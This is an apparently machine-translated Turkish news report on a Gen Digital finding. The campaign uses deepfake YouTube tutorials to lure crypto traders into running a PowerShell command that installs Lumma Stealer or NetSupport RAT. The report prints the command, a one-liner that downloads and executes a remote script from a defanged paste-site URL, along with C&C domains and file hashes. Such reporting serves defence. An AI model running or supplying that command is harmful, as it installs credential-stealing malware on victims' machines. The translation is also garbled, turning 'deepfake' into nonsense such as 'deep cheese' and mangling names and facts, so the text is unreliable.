Yeni bir “aldatmaca Kendin” dalgası, AI tarafından üretilen derin peynir videolarından ve kötü niyetli senaryolardan yararlanan saldırılar, kripto para meraklılarını ve finansal tüccarları hedefliyor ve sosyal mühendislik taktiklerinde tehlikeli bir evrimi işaret ediyor.
Gen Digital’de siber güvenlik araştırmacıları tarafından keşfedilen bu kampanya, kurbanları kendi sistemlerinden ödün vermeleri için manipüle etmek için doğrulanmış YouTube kanallarını, sentetik kişileri ve AI-hazırlanmış yükleri kullanıyor.
.webp)
Üçüncü çeyrekte% 614 artış gören saldırılar, psikolojik olarak uyarlanmış yemlerle en son derin peynir teknolojisi, siber suçlarda üretken AI’nın silahlanmasıyla ilgili acil endişeleri artırdı.
Güvenlik analistleri, işlemin 110.000 aboneye sahip tehlikeye atılmış bir YouTube kanalında barındırılan bir derin pasta videosu ile başladığını belirtti.
Video, gelişmiş yüz animasyonu, ses sentezi ve vücut hareketi çoğaltması kullanılarak oluşturulan “Thomas Harris” veya “Thomas Roberts” adlı sentetik bir kişiye sahiptir.
.webp)
Kanalın meşru görünümüne rağmen-TRADINGVIEW’den yeniden tasarlanmış içerik de dahil olmak üzere-Liste edilmemiş öğretici video, izleyicilere kripto para piyasası eğilimlerini% 97 doğrulukla öngören hayali bir “AI ile çalışan geliştirici modu” etkinleştirmelerini istemektedir.
Deepforkes’tan PowerShell yüklerine kadar
Saldırının çekirdeği, şüpheyi atlamak için tasarlanmış AI tarafından oluşturulan senaryoları kullanmasında yatmaktadır.
İzleyiciler, Windows’un Run iletişim kutusunu (Win+R) açmaya ve Pastefy gibi yapıştırma paylaşım sitelerinden kötü amaçlı bir komut dosyasını getiren bir PowerShell komutunu yürütmeye yönlendirilir[.]com veya obin[.]açık.
Araştırmacılar tarafından şifrelenen bir temsilci yük, kodlarını geliştirmek için ChatGPT kullanan saldırganları gösteriyor:-
iex (New-Object Net.WebClient).DownloadString('hxxps://pastefy[.]com/raw/AbCdE123') Bu komut dosyası, geliştirici-güncelleme olarak izlenen bir komut ve kontrol (C&C) sunucusuna bağlanır[.]Dev veya geliştirici[.]Dev – Lumma Stealer veya Netsupport Uzaktan Erişim Aracı’nı dağıtmak için (Şekil 2).
%20script%20into%20the%20command%20prompt%20(Source%20-%20GenDigital).webp)
(Kötü niyetli) komut dosyasının komut istemine nasıl ekleneceğini gösteren video (kaynak – cendugital)
Birincisi, kripto para cüzdanları ve tarayıcı kimlik bilgilerini hasat ederken, ikincisi tam sistem kontrolü sağlar. Adli analiz, aşağıdakiler dahil olmak üzere anahtar bileşenler için SHA-256 karmalarını ortaya çıkardı:
a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797(Kötü niyetli Powershell betiği)2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e(Sahne Stealer bir varyanttır)
En önemlisi, Deep Tesenli videosu yapay doğasını prosedürel detaylarla gizler-sentetik bir ses, kayıt defteri istisnaları ekleyerek Windows Defender’ı nasıl atlayacağını açıklarken, ekran tuş vuruşları yansıtma otantik TradingView iş akışlarını açıklar.
Saldırganlar, YouTube’un sponsorlu reklam sistemi aracılığıyla erişimi artırarak, kullanıcıları meşru finansal içeriği izleyen kullanıcıları hedefliyor.
Geleneksel kimlik avı’ndan farklı olarak, kurbanlar, özel araçlara eriştiklerine inanarak uzlaşmalarına aktif olarak katılırlar. Siber suçlular artık persona oluşturma ve senaryo arıtımını otomatikleştirirken, birden fazla kanal aracılığıyla dijital talimatları doğrulamak pazarlık edilemez bir güvenlik uygulaması haline gelmiştir.
Ücretsiz Web Semineri: Olay Yanıtı ve Tehdit Avı için Etkileşimli Kötü Yazılım Sandbox ile Better SOC – Buraya Kaydolun